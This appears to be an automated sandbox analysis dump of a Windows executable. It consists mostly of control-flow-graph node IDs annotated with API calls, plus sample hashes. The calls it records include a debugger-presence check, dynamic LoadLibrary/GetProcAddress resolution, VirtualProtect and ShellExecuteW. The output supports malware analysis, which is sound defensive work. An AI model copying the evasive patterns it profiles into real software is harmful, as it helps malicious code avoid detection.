416e29 GetModuleHandleW 84930->84964 84934 416223 __RTC_Initialize 84998 41b669 84934->84998 84937 416231 84938 41623d GetCommandLineW 84937->84938 85066 4117af 67 API calls 3 library calls 84937->85066 85013 42235f GetEnvironmentStringsW 84938->85013 84941 41623c 84941->84938 84942 41624c 85019 4222b1 GetModuleFileNameW 84942->85019 84944 416256 84945 416261 84944->84945 85067 4117af 67 API calls 3 library calls 84944->85067 85023 422082 84945->85023 84951 416272 85036 41186e 84951->85036 84952 416279 84954 416284 __wwincmdln 84952->84954 85069 4117af 67 API calls 3 library calls 84952->85069 85042 40d7f0 84954->85042 84957 4162b3 85071 411a4b 67 API calls _doexit 84957->85071 84960 4162b8 __calloc_impl 84961->84926 84963 416206 84962->84963 84963->84930 85064 41616a 67 API calls 3 library calls 84963->85064 84965 416e44 84964->84965 84966 416e3d 84964->84966 84968 416fac 84965->84968 84969 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 84965->84969 85072 41177f Sleep GetModuleHandleW 84966->85072 85082 416ad5 70 API calls 2 library calls 84968->85082 84972 416e97 TlsAlloc 84969->84972 84971 416e43 84971->84965 84974 416218 84972->84974 84975 416ee5 TlsSetValue 84972->84975 84974->84934 85065 41616a 67 API calls 3 library calls 84974->85065 84975->84974 84976 416ef6 84975->84976 85073 411a69 6 API calls 3 library calls 84976->85073 84978 416efb 84979 41696e __encode_pointer 6 API calls 84978->84979 84980 416f06 84979->84980 84981 41696e __encode_pointer 6 API calls 84980->84981 84982 416f16 84981->84982 84983 41696e __encode_pointer 6 API calls 84982->84983 84984 416f26 84983->84984 84985 41696e __encode_pointer 6 API calls 84984->84985 84986 416f36 84985->84986 85074 41828b InitializeCriticalSectionAndSpinCount __mtinitlocknum 84986->85074 84988 416f43 84988->84968 84989 4169e9 __decode_pointer 6 API calls 84988->84989 84990 416f57 84989->84990 84990->84968 85075 416ffb 84990->85075 84993 4169e9 __decode_pointer 6 API calls 84994 416f8a 
84993->84994 84994->84968 84995 416f91 84994->84995 85081 416b12 67 API calls 5 library calls 84995->85081 84997 416f99 GetCurrentThreadId 84997->84974 85101 41718c 84998->85101 85000 41b675 GetStartupInfoA 85001 416ffb __calloc_crt 67 API calls 85000->85001 85007 41b696 85001->85007 85002 41b8b4 __calloc_impl 85002->84937 85003 41b831 GetStdHandle 85012 41b7fb 85003->85012 85004 41b896 SetHandleCount 85004->85002 85005 416ffb __calloc_crt 67 API calls 85005->85007 85006 41b843 GetFileType 85006->85012 85007->85002 85007->85005 85008 41b77e 85007->85008 85007->85012 85008->85002 85009 41b7a7 GetFileType 85008->85009 85008->85012 85102 4189e6 InitializeCriticalSectionAndSpinCount __calloc_impl 85008->85102 85009->85008 85012->85002 85012->85003 85012->85004 85012->85006 85103 4189e6 InitializeCriticalSectionAndSpinCount __calloc_impl 85012->85103 85014 422370 85013->85014 85015 422374 85013->85015 85014->84942 85016 416fb6 __malloc_crt 67 API calls 85015->85016 85017 422395 _realloc 85016->85017 85018 42239c FreeEnvironmentStringsW 85017->85018 85018->84942 85020 4222e6 _wparse_cmdline 85019->85020 85021 416fb6 __malloc_crt 67 API calls 85020->85021 85022 422329 _wparse_cmdline 85020->85022 85021->85022 85022->84944 85024 42209a _wcslen 85023->85024 85028 416267 85023->85028 85025 416ffb __calloc_crt 67 API calls 85024->85025 85031 4220be _wcslen 85025->85031 85026 422123 85027 413a88 __wsetenvp 67 API calls 85026->85027 85027->85028 85028->84951 85068 4117af 67 API calls 3 library calls 85028->85068 85029 416ffb __calloc_crt 67 API calls 85029->85031 85030 422149 85032 413a88 __wsetenvp 67 API calls 85030->85032 85031->85026 85031->85028 85031->85029 85031->85030 85034 422108 85031->85034 85104 426349 67 API calls __calloc_impl 85031->85104 85032->85028 85034->85031 85105 417d93 10 API calls 3 library calls 85034->85105 85037 41187c __IsNonwritableInCurrentImage 85036->85037 85106 418486 85037->85106 85039 41189a __initterm_e 85040 411421 __cinit 74 API calls 
85039->85040 85041 4118b9 __IsNonwritableInCurrentImage __initterm 85039->85041 85040->85041 85041->84952 85043 431bcb 85042->85043 85044 40d80c 85042->85044 85045 4092c0 VariantClear 85044->85045 85046 40d847 85045->85046 85110 40eb50 85046->85110 85051 40d877 85113 411ac6 67 API calls 4 library calls 85051->85113 85052 40d888 85114 411b24 67 API calls __calloc_impl 85052->85114 85054 40d891 85115 40f370 SystemParametersInfoW SystemParametersInfoW 85054->85115 85056 40d89f 85116 40d6d0 GetCurrentDirectoryW 85056->85116 85058 40d8a7 SystemParametersInfoW 85059 40d8cd 85058->85059 85060 4092c0 VariantClear 85059->85060 85061 40d8dd 85060->85061 85062 4092c0 VariantClear 85061->85062 85063 40d8e6 85062->85063 85063->84957 85070 411a1f 67 API calls _doexit 85063->85070 85064->84930 85065->84934 85066->84941 85067->84945 85068->84951 85069->84954 85070->84957 85071->84960 85072->84971 85073->84978 85074->84988 85077 417004 85075->85077 85078 416f70 85077->85078 85079 417022 Sleep 85077->85079 85083 422452 85077->85083 85078->84968 85078->84993 85080 417037 85079->85080 85080->85077 85080->85078 85081->84997 85082->84974 85084 42245e __calloc_impl 85083->85084 85085 422476 85084->85085 85090 422495 _memset 85084->85090 85096 417f23 67 API calls __getptd_noexit 85085->85096 85087 42247b 85097 417ebb 6 API calls 2 library calls 85087->85097 85089 422507 HeapAlloc 85089->85090 85090->85089 85092 418407 __lock 66 API calls 85090->85092 85093 42248b __calloc_impl 85090->85093 85098 41a74c 5 API calls 2 library calls 85090->85098 85099 42254e LeaveCriticalSection _doexit 85090->85099 85100 411afc 6 API calls __decode_pointer 85090->85100 85092->85090 85093->85077 85096->85087 85098->85090 85099->85090 85100->85090 85101->85000 85102->85008 85103->85012 85104->85031 85105->85034 85107 41848c 85106->85107 85108 41696e __encode_pointer 6 API calls 85107->85108 85109 4184a4 85107->85109 85108->85107 85109->85039 85154 40eb70 85110->85154 85113->85052 85114->85054 85115->85056 
85158 401f80 85116->85158 85118 40d6f1 IsDebuggerPresent 85119 431a9d MessageBoxA 85118->85119 85120 40d6ff 85118->85120 85121 431ab6 85119->85121 85120->85121 85122 40d71f 85120->85122 85260 403e90 75 API calls 3 library calls 85121->85260 85228 40f3b0 85122->85228 85126 40d73a GetFullPathNameW 85258 401440 127 API calls _wcscat 85126->85258 85128 40d77a 85129 40d782 85128->85129 85131 431b09 SetCurrentDirectoryW 85128->85131 85130 40d78b 85129->85130 85261 43604b 6 API calls 85129->85261 85240 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 85130->85240 85131->85129 85134 431b28 85134->85130 85136 431b30 GetModuleFileNameW 85134->85136 85138 431ba4 GetForegroundWindow ShellExecuteW 85136->85138 85139 431b4c 85136->85139 85142 40d7c7 85138->85142 85262 401b70 85139->85262 85140 40d795 85148 40d7a8 85140->85148 85248 40e1e0 85140->85248 85145 40d7d1 SetCurrentDirectoryW 85142->85145 85145->85058 85147 431b66 85269 40d3b0 75 API calls 2 library calls 85147->85269 85148->85142 85259 401000 Shell_NotifyIconW _memset 85148->85259 85151 431b72 GetForegroundWindow ShellExecuteW 85152 431b9f 85151->85152 85152->85142 85153 40eba0 LoadLibraryA GetProcAddress 85153->85051 85155 40d86e 85154->85155 85156 40eb76 LoadLibraryA 85154->85156 85155->85051 85155->85153 85156->85155 85157 40eb87 GetProcAddress 85156->85157 85157->85155 85270 40e680 85158->85270 85162 401fa2 GetModuleFileNameW 85288 40ff90 85162->85288 85164 401fbd 85300 4107b0 85164->85300 85167 401b70 75 API calls 85168 401fe4 85167->85168 85303 4019e0 85168->85303 85170 401ff2 85171 4092c0 VariantClear 85170->85171 85172 402002 85171->85172 85173 401b70 75 API calls 85172->85173 85174 40201c 85173->85174 85175 4019e0 76 API calls 85174->85175 85176 40202c 85175->85176 85177 401b70 75 API calls 85176->85177 85178 40203c 85177->85178 85311 40c3e0 85178->85311 85180 40204d 85329 40c060 85180->85329 85184 40206e 85341 4115d0 85184->85341 85187 42c174 85189 401a70 75 API calls 85187->85189 85188 
402088 85190 4115d0 __wcsicoll 79 API calls 85188->85190 85191 42c189 85189->85191 85192 402093 85190->85192 85194 401a70 75 API calls 85191->85194 85192->85191 85193 40209e 85192->85193 85195 4115d0 __wcsicoll 79 API calls 85193->85195 85196 42c1a7 85194->85196 85197 4020a9 85195->85197 85198 42c1b0 GetModuleFileNameW 85196->85198 85197->85198 85199 4020b4 85197->85199 85201 401a70 75 API calls 85198->85201 85200 4115d0 __wcsicoll 79 API calls 85199->85200 85202 4020bf 85200->85202 85203 42c1e2 85201->85203 85204 402107 85202->85204 85207 42c20a _wcscpy 85202->85207 85210 401a70 75 API calls 85202->85210 85353 40df50 75 API calls 85203->85353 85206 402119 85204->85206 85204->85207 85209 42c243 85206->85209 85349 40e7e0 76 API calls 85206->85349 85215 401a70 75 API calls 85207->85215 85208 42c1f1 85211 401a70 75 API calls 85208->85211 85214 4020e5 _wcscpy 85210->85214 85212 42c201 85211->85212 85212->85207 85218 401a70 75 API calls 85214->85218 85223 402148 85215->85223 85216 402132 85350 40d030 76 API calls 85216->85350 85218->85204 85219 40213e 85220 4092c0 VariantClear 85219->85220 85220->85223 85221 402184 85225 4092c0 VariantClear 85221->85225 85223->85221 85226 401a70 75 API calls 85223->85226 85351 40d030 76 API calls 85223->85351 85352 40e640 76 API calls 85223->85352 85227 402196 ctype 85225->85227 85226->85223 85227->85118 85229 40f3c9 85228->85229 85230 42ccf4 _memset 85228->85230 86031 40ffb0 76 API calls ctype 85229->86031 85232 42cd05 GetOpenFileNameW 85230->85232 85232->85229 85235 40d732 85232->85235 85233 40f3d2 86032 410130 SHGetMalloc 85233->86032 85235->85126 85235->85128 85236 40f3d9 86037 410020 88 API calls __wcsicoll 85236->86037 85238 40f3e7 86038 40f400 85238->86038 85241 42b9d3 85240->85241 85242 41025a LoadImageW RegisterClassExW 85240->85242 86085 443e8f EnumResourceNamesW LoadImageW 85241->86085 86084 4102f0 7 API calls 85242->86084 85245 42b9da 85246 40d790 85247 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 
85246->85247 85247->85140 85250 40e207 _memset 85248->85250 85249 40e262 85252 40e2a4 85249->85252 86086 43737d 84 API calls __wcsicoll 85249->86086 85250->85249 85251 42aa14 DestroyIcon 85250->85251 85251->85249 85254 40e2c0 Shell_NotifyIconW 85252->85254 85255 42aa50 Shell_NotifyIconW 85252->85255 85256 401be0 77 API calls 85254->85256 85257 40e2da 85256->85257 85257->85148 85258->85128 85259->85142 85260->85128 85261->85134 85263 401b76 _wcslen 85262->85263 85264 41171a 75 API calls 85263->85264 85267 401bc5 85263->85267 85265 401bad _realloc 85264->85265 85266 41171a 75 API calls 85265->85266 85266->85267 85268 40d3b0 75 API calls 2 library calls 85267->85268 85268->85147 85269->85151 85271 40c060 75 API calls 85270->85271 85272 401f90 85271->85272 85273 402940 85272->85273 85274 40294a __write_nolock 85273->85274 85275 4021e0 75 API calls 85274->85275 85277 402972 85275->85277 85287 4029a4 85277->85287 85354 401cf0 85277->85354 85278 402ae0 75 API calls 85278->85287 85279 402a8c 85280 401b70 75 API calls 85279->85280 85286 402abe 85279->85286 85282 402ab3 85280->85282 85281 401b70 75 API calls 85281->85287 85358 40d970 75 API calls 2 library calls 85282->85358 85284 401cf0 75 API calls 85284->85287 85286->85162 85287->85278 85287->85279 85287->85281 85287->85284 85357 40d970 75 API calls 2 library calls 85287->85357 85359 40f5e0 85288->85359 85291 40ffa6 85291->85164 85293 42b6d8 85296 42b6e6 85293->85296 85415 434fe1 85293->85415 85295 413a88 __wsetenvp 67 API calls 85297 42b6f5 85295->85297 85296->85295 85298 434fe1 106 API calls 85297->85298 85299 42b702 85298->85299 85299->85164 85301 41171a 75 API calls 85300->85301 85302 401fd6 85301->85302 85302->85167 85304 401a03 85303->85304 85309 4019e5 85303->85309 85305 401a1a 85304->85305 85304->85309 86020 404260 76 API calls 85305->86020 85307 4019ff 85307->85170 85308 401a26 85308->85170 85309->85307 86019 404260 76 API calls 85309->86019 85312 40c3e4 85311->85312 85313 40c42c 85311->85313 85316 40c3f0 
85312->85316 85317 42a475 85312->85317 85314 42a422 85313->85314 85315 40c435 85313->85315 85321 42a427 85314->85321 85322 42a445 85314->85322 85318 40c441 85315->85318 85319 42a455 85315->85319 86021 4042f0 75 API calls __cinit 85316->86021 86026 453155 75 API calls 85317->86026 86022 4042f0 75 API calls __cinit 85318->86022 86025 453155 75 API calls 85319->86025 85328 40c3fb 85321->85328 86023 453155 75 API calls 85321->86023 86024 453155 75 API calls 85322->86024 85328->85180 85328->85328 85330 41171a 75 API calls 85329->85330 85331 40c088 85330->85331 85332 41171a 75 API calls 85331->85332 85333 402061 85332->85333 85334 401a70 85333->85334 85335 401a90 85334->85335 85336 401a77 85334->85336 85337 4021e0 75 API calls 85335->85337 85338 401a8d 85336->85338 86027 404080 75 API calls _realloc 85336->86027 85339 401a9c 85337->85339 85338->85184 85339->85184 85342 4115e1 85341->85342 85343 411650 85341->85343 85348 40207d 85342->85348 86028 417f23 67 API calls __getptd_noexit 85342->86028 86030 4114bf 79 API calls 3 library calls 85343->86030 85346 4115ed 86029 417ebb 6 API calls 2 library calls 85346->86029 85348->85187 85348->85188 85349->85216 85350->85219 85351->85223 85352->85223 85353->85208 85355 402ae0 75 API calls 85354->85355 85356 401cf7 85355->85356 85356->85277 85357->85287 85358->85286 85419 40f580 85359->85419 85361 40f5f8 _strcat ctype 85427 40f6d0 85361->85427 85366 42b2ee 85456 4151b0 85366->85456 85368 40f679 85368->85366 85369 40f681 85368->85369 85443 414e94 85369->85443 85373 40f68b 85373->85291 85378 452574 85373->85378 85375 42b31d 85462 415484 85375->85462 85377 42b33d 85379 41557c _fseek 105 API calls 85378->85379 85380 4525df 85379->85380 85964 4523ce 85380->85964 85383 4525fc 85383->85293 85384 4151b0 __fread_nolock 81 API calls 85385 45261d 85384->85385 85386 4151b0 __fread_nolock 81 API calls 85385->85386 85387 45262e 85386->85387 85388 4151b0 __fread_nolock 81 API calls 85387->85388 85389 452649 85388->85389 85390 4151b0 __fread_nolock 
81 API calls 85389->85390 85391 452666 85390->85391 85392 41557c _fseek 105 API calls 85391->85392 85393 452682 85392->85393 85394 4138ba _malloc 67 API calls 85393->85394 85395 45268e 85394->85395 85396 4138ba _malloc 67 API calls 85395->85396 85397 45269b 85396->85397 85398 4151b0 __fread_nolock 81 API calls 85397->85398 85399 4526ac 85398->85399 85400 44afdc GetSystemTimeAsFileTime 85399->85400 85401 4526bf 85400->85401 85402 4526d5 85401->85402 85403 4526fd 85401->85403 85406 413a88 __wsetenvp 67 API calls 85402->85406 85404 452704 85403->85404 85405 45275b 85403->85405 85970 44b195 85404->85970 85408 413a88 __wsetenvp 67 API calls 85405->85408 85409 4526df 85406->85409 85411 452759 85408->85411 85412 413a88 __wsetenvp 67 API calls 85409->85412 85410 452753 85413 413a88 __wsetenvp 67 API calls 85410->85413 85411->85293 85414 4526e8 85412->85414 85413->85411 85414->85293 85416 434ff1 85415->85416 85417 434feb 85415->85417 85416->85296 85418 414e94 __fcloseall 106 API calls 85417->85418 85418->85416 85420 429440 85419->85420 85421 40f589 _wcslen 85419->85421 85422 40f58f WideCharToMultiByte 85421->85422 85423 40f5d8 85422->85423 85424 40f5ad 85422->85424 85423->85361 85425 41171a 75 API calls 85424->85425 85426 40f5bb WideCharToMultiByte 85425->85426 85426->85361 85428 40f6dd _strlen 85427->85428 85475 40f790 85428->85475 85431 414e06 85495 414d40 85431->85495 85433 40f666 85433->85366 85434 40f450 85433->85434 85438 40f45a _strcat _realloc __write_nolock 85434->85438 85435 4151b0 __fread_nolock 81 API calls 85435->85438 85437 42936d 85439 41557c _fseek 105 API calls 85437->85439 85438->85435 85438->85437 85442 40f531 85438->85442 85578 41557c 85438->85578 85440 429394 85439->85440 85441 4151b0 __fread_nolock 81 API calls 85440->85441 85441->85442 85442->85368 85444 414ea0 __calloc_impl 85443->85444 85445 414ed1 85444->85445 85446 414eb4 85444->85446 85449 415965 __lock_file 68 API calls 85445->85449 85452 414ec9 __calloc_impl 85445->85452 85717 417f23 67 API 
calls __getptd_noexit 85446->85717 85448 414eb9 85718 417ebb 6 API calls 2 library calls 85448->85718 85451 414ee9 85449->85451 85701 414e1d 85451->85701 85452->85373 85786 41511a 85456->85786 85458 4151c8 85459 44afdc 85458->85459 85957 4431e0 85459->85957 85461 44affd 85461->85375 85463 415490 __calloc_impl 85462->85463 85464 4154bb 85463->85464 85465 41549e 85463->85465 85466 415965 __lock_file 68 API calls 85464->85466 85961 417f23 67 API calls __getptd_noexit 85465->85961 85468 4154c3 85466->85468 85470 4152e7 __ftell_nolock 71 API calls 85468->85470 85469 4154a3 85962 417ebb 6 API calls 2 library calls 85469->85962 85472 4154cf 85470->85472 85963 4154e8 LeaveCriticalSection LeaveCriticalSection _ftell 85472->85963 85474 4154b3 __calloc_impl 85474->85377 85478 40f7ae _memset 85475->85478 85476 42a349 85478->85476 85479 40f628 85478->85479 85480 415258 85478->85480 85479->85431 85481 415285 85480->85481 85482 415268 85480->85482 85481->85482 85483 41528c 85481->85483 85491 417f23 67 API calls __getptd_noexit 85482->85491 85493 41c551 103 API calls 14 library calls 85483->85493 85486 41526d 85492 417ebb 6 API calls 2 library calls 85486->85492 85488 4152b2 85489 41527d 85488->85489 85494 4191c9 101 API calls 6 library calls 85488->85494 85489->85478 85491->85486 85493->85488 85494->85489 85496 414d4c __calloc_impl 85495->85496 85497 414d5f 85496->85497 85499 414d95 85496->85499 85547 417f23 67 API calls __getptd_noexit 85497->85547 85514 41e28c 85499->85514 85500 414d64 85548 417ebb 6 API calls 2 library calls 85500->85548 85503 414d9a 85504 414da1 85503->85504 85505 414dae 85503->85505 85549 417f23 67 API calls __getptd_noexit 85504->85549 85507 414dd6 85505->85507 85508 414db6 85505->85508 85532 41dfd8 85507->85532 85550 417f23 67 API calls __getptd_noexit 85508->85550 85512 414d74 __calloc_impl @_EH4_CallFilterFunc@8 85512->85433 85515 41e298 __calloc_impl 85514->85515 85516 418407 __lock 67 API calls 85515->85516 85517 41e2a6 85516->85517 85518 41e322 
85517->85518 85524 418344 __mtinitlocknum 67 API calls 85517->85524 85529 41e31b 85517->85529 85555 4159a6 68 API calls __lock 85517->85555 85556 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 85517->85556 85519 416fb6 __malloc_crt 67 API calls 85518->85519 85522 41e32c 85519->85522 85521 41e3b0 __calloc_impl 85521->85503 85522->85529 85557 4189e6 InitializeCriticalSectionAndSpinCount __calloc_impl 85522->85557 85524->85517 85526 41e351 85527 41e35c 85526->85527 85528 41e36f EnterCriticalSection 85526->85528 85530 413a88 __wsetenvp 67 API calls 85527->85530 85528->85529 85552 41e3bb 85529->85552 85530->85529 85539 41dffb __wopenfile 85532->85539 85533 41e015 85562 417f23 67 API calls __getptd_noexit 85533->85562 85535 41e01a 85563 417ebb 6 API calls 2 library calls 85535->85563 85537 41e247 85559 425db0 85537->85559 85539->85533 85546 41e1e9 85539->85546 85564 4136bc 79 API calls 2 library calls 85539->85564 85542 41e1e2 85542->85546 85565 4136bc 79 API calls 2 library calls 85542->85565 85544 41e201 85544->85546 85566 4136bc 79 API calls 2 library calls 85544->85566 85546->85533 85546->85537 85547->85500 85549->85512 85550->85512 85551 414dfc LeaveCriticalSection LeaveCriticalSection _ftell 85551->85512 85558 41832d LeaveCriticalSection 85552->85558 85554 41e3c2 85554->85521 85555->85517 85556->85517 85557->85526 85558->85554 85567 425ce4 85559->85567 85561 414de1 85561->85551 85562->85535 85564->85542 85565->85544 85566->85546 85570 425cf0 __calloc_impl 85567->85570 85568 425d03 85569 417f23 __calloc_impl 67 API calls 85568->85569 85571 425d08 85569->85571 85570->85568 85572 425d41 85570->85572 85573 417ebb __calloc_impl 6 API calls 85571->85573 85574 4255c4 __tsopen_nolock 132 API calls 85572->85574 85577 425d17 __calloc_impl 85573->85577 85575 425d5b 85574->85575 85576 425d82 __sopen_helper LeaveCriticalSection 85575->85576 85576->85577 85577->85561 85582 415588 __calloc_impl 85578->85582 85579 415596 85609 417f23 67 API calls __getptd_noexit 
85579->85609 85581 4155c4 85591 415965 85581->85591 85582->85579 85582->85581 85584 41559b 85610 417ebb 6 API calls 2 library calls 85584->85610 85590 4155ab __calloc_impl 85590->85438 85592 415977 85591->85592 85593 415999 EnterCriticalSection 85591->85593 85592->85593 85594 41597f 85592->85594 85595 4155cc 85593->85595 85596 418407 __lock 67 API calls 85594->85596 85597 4154f2 85595->85597 85596->85595 85598 415512 85597->85598 85599 415502 85597->85599 85604 415524 85598->85604 85612 4152e7 85598->85612 85666 417f23 67 API calls __getptd_noexit 85599->85666 85603 415507 85611 4155f7 LeaveCriticalSection LeaveCriticalSection _ftell 85603->85611 85629 41486c 85604->85629 85609->85584 85611->85590 85613 41531a 85612->85613 85614 4152fa 85612->85614 85616 41453a __fileno 67 API calls 85613->85616 85667 417f23 67 API calls __getptd_noexit 85614->85667 85618 415320 85616->85618 85617 4152ff 85668 417ebb 6 API calls 2 library calls 85617->85668 85620 41efd4 __locking 71 API calls 85618->85620 85621 415335 85620->85621 85622 4153a9 85621->85622 85624 415364 85621->85624 85628 41530f 85621->85628 85669 417f23 67 API calls __getptd_noexit 85622->85669 85625 41efd4 __locking 71 API calls 85624->85625 85624->85628 85626 415404 85625->85626 85627 41efd4 __locking 71 API calls 85626->85627 85626->85628 85627->85628 85628->85604 85630 414885 85629->85630 85634 4148a7 85629->85634 85631 41453a __fileno 67 API calls 85630->85631 85630->85634 85632 4148a0 85631->85632 85670 41c3cf 101 API calls 5 library calls 85632->85670 85635 41453a 85634->85635 85636 41455e 85635->85636 85637 414549 85635->85637 85641 41efd4 85636->85641 85671 417f23 67 API calls __getptd_noexit 85637->85671 85639 41454e 85672 417ebb 6 API calls 2 library calls 85639->85672 85642 41efe0 __calloc_impl 85641->85642 85643 41f003 85642->85643 85644 41efe8 85642->85644 85646 41f011 85643->85646 85649 41f052 85643->85649 85693 417f36 67 API calls __getptd_noexit 85644->85693 85695 417f36 67 API calls 
__getptd_noexit 85646->85695 85647 41efed 85694 417f23 67 API calls __getptd_noexit 85647->85694 85673 41ba3b 85649->85673 85651 41f016 85696 417f23 67 API calls __getptd_noexit 85651->85696 85654 41f058 85657 41f065 85654->85657 85658 41f07b 85654->85658 85655 41f01d 85697 417ebb 6 API calls 2 library calls 85655->85697 85683 41ef5f 85657->85683 85698 417f23 67 API calls __getptd_noexit 85658->85698 85659 41eff5 __calloc_impl 85659->85603 85662 41f073 85700 41f0a6 LeaveCriticalSection __unlock_fhandle 85662->85700 85663 41f080 85699 417f36 67 API calls __getptd_noexit 85663->85699 85666->85603 85667->85617 85669->85628 85670->85634 85671->85639 85674 41ba47 __calloc_impl 85673->85674 85675 41baa2 85674->85675 85678 418407 __lock 67 API calls 85674->85678 85676 41bac4 __calloc_impl 85675->85676 85677 41baa7 EnterCriticalSection 85675->85677 85676->85654 85677->85676 85679 41ba73 85678->85679 85680 4189e6 __mtinitlocknum InitializeCriticalSectionAndSpinCount 85679->85680 85682 41ba8a 85679->85682 85680->85682 85681 41bad2 ___lock_fhandle LeaveCriticalSection 85681->85675 85682->85681 85684 41b9c4 __lseek_nolock 67 API calls 85683->85684 85685 41ef6e 85684->85685 85686 41ef84 SetFilePointer 85685->85686 85687 41ef74 85685->85687 85689 41ef9b GetLastError 85686->85689 85691 41efa3 85686->85691 85688 417f23 __calloc_impl 67 API calls 85687->85688 85690 41ef79 85688->85690 85689->85691 85690->85662 85691->85690 85692 417f49 __dosmaperr 67 API calls 85691->85692 85692->85690 85693->85647 85694->85659 85695->85651 85696->85655 85698->85663 85699->85662 85700->85659 85702 414e31 85701->85702 85703 414e4d 85701->85703 85747 417f23 67 API calls __getptd_noexit 85702->85747 85705 414e46 85703->85705 85707 41486c __flush 101 API calls 85703->85707 85719 414f08 LeaveCriticalSection LeaveCriticalSection _ftell 85705->85719 85706 414e36 85748 417ebb 6 API calls 2 library calls 85706->85748 85709 414e59 85707->85709 85720 41e680 85709->85720 85712 41453a __fileno 67 API calls 
85713 414e67 85712->85713 85724 41e5b3 85713->85724 85715 414e6d 85715->85705 85716 413a88 __wsetenvp 67 API calls 85715->85716 85716->85705 85717->85448 85719->85452 85721 41e690 85720->85721 85722 414e61 85720->85722 85721->85722 85723 413a88 __wsetenvp 67 API calls 85721->85723 85722->85712 85723->85722 85725 41e5bf __calloc_impl 85724->85725 85726 41e5e2 85725->85726 85727 41e5c7 85725->85727 85729 41e5f0 85726->85729 85733 41e631 85726->85733 85764 417f36 67 API calls __getptd_noexit 85727->85764 85766 417f36 67 API calls __getptd_noexit 85729->85766 85731 41e5cc 85765 417f23 67 API calls __getptd_noexit 85731->85765 85732 41e5f5 85767 417f23 67 API calls __getptd_noexit 85732->85767 85736 41ba3b ___lock_fhandle 68 API calls 85733->85736 85738 41e637 85736->85738 85737 41e5fc 85768 417ebb 6 API calls 2 library calls 85737->85768 85740 41e652 85738->85740 85741 41e644 85738->85741 85769 417f23 67 API calls __getptd_noexit 85740->85769 85749 41e517 85741->85749 85742 41e5d4 __calloc_impl 85742->85715 85745 41e64c 85770 41e676 LeaveCriticalSection __unlock_fhandle 85745->85770 85747->85706 85771 41b9c4 85749->85771 85751 41e57d 85784 41b93e 68 API calls 2 library calls 85751->85784 85753 41e527 85753->85751 85755 41b9c4 __lseek_nolock 67 API calls 85753->85755 85763 41e55b 85753->85763 85754 41e585 85757 41e5a7 85754->85757 85785 417f49 67 API calls 3 library calls 85754->85785 85758 41e552 85755->85758 85756 41b9c4 __lseek_nolock 67 API calls 85759 41e567 CloseHandle 85756->85759 85757->85745 85761 41b9c4 __lseek_nolock 67 API calls 85758->85761 85759->85751 85762 41e573 GetLastError 85759->85762 85761->85763 85762->85751 85763->85751 85763->85756 85764->85731 85765->85742 85766->85732 85767->85737 85769->85745 85770->85742 85772 41b9d1 85771->85772 85774 41b9e9 85771->85774 85773 417f36 __free_osfhnd 67 API calls 85772->85773 85776 41b9d6 85773->85776 85775 417f36 __free_osfhnd 67 API calls 85774->85775 85777 41ba2e 85774->85777 85778 41ba17 85775->85778 85779 
(Control-flow graph of this function cluster: the interactive graph rendered by the Joe Sandbox IDA plugin survives only as an edge list of node IDs, so the API calls named at its nodes are summarised here instead.)
• CRT file I/O, read path: __lock_file, ___lock_fhandle, __unlock_fhandle/LeaveCriticalSection, __fileno, __read, ReadFile (41e8bb, 41ea7d, 41eca5), GetLastError, MultiByteToWideChar (41ebbe), __lseeki64_nolock, _fseek, _ftell, __fread_nolock, __fcloseall, __free_osfhnd, __dosmaperr, __getptd_noexit
• CRT memory and string helpers: __calloc_impl, __malloc_crt, _malloc, _realloc, _memset, _wcscpy, _wcslen, _strcat, __wcsicoll, __wsetenvp, __cinit, _printf, __aulldiv, GetSystemTimeAsFileTime (414cef, 44afdc)
• Shell and window message handling: SHGetDesktopFolder (410148), SHGetPathFromIDListW (41018a), TranslateMessage/DispatchMessageW (4098f1), TranslateAcceleratorW (4292fd), IsDialogMessageW (42972a), GetClassLongW (4340ec), CharUpperBuffW (409aeb, 402ff0)
• OLE VARIANT handling: VariantClear (many sites), VariantInit/VariantCopy (42dd10)
• Process and timing: WaitForSingleObject (4315b8), GetExitCodeProcess/CloseHandle (4315d6, 43170c), CloseHandle (431673), Sleep (40986e, 431623, 431781), timeGetTime (409880, 43163b), GetCurrentProcess/TerminateProcess (4736ba)
• File access: CreateFileW (40eff5, 4299c4), SetFilePointerEx (40e0d0)
• Dynamic API resolution and memory protection: LoadLibraryW (463dd0) followed by GetProcAddress (463e62, 463e82, 463ec8); VirtualProtect (410ded)
• OS version and architecture fingerprinting: GetVersionExW (40e483), LoadLibraryA/GetProcAddress (40ee30, 40ee76/40ee87, 40eee6/40eef7, 40eec0), GetCurrentProcess (40e557), GetNativeSystemInfo (40e5d3), GetSystemInfo (42ad28, 42ad38), FreeLibrary (40e5dd, 40e5f1)
APIs
• _wcslen.LIBCMT ref: 00409A61
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
• CharUpperBuffW.USER32(?,?), ref: 00409AF5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID: 0vH$4RH
• API String ID: 1143807570-2085553193
• Opcode ID: 6ed877a5d1cb41e7463924ba79375fc69617cb0e7df98969b0dc710bcd39381e
• Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
• Opcode Fuzzy Hash: 6ed877a5d1cb41e7463924ba79375fc69617cb0e7df98969b0dc710bcd39381e
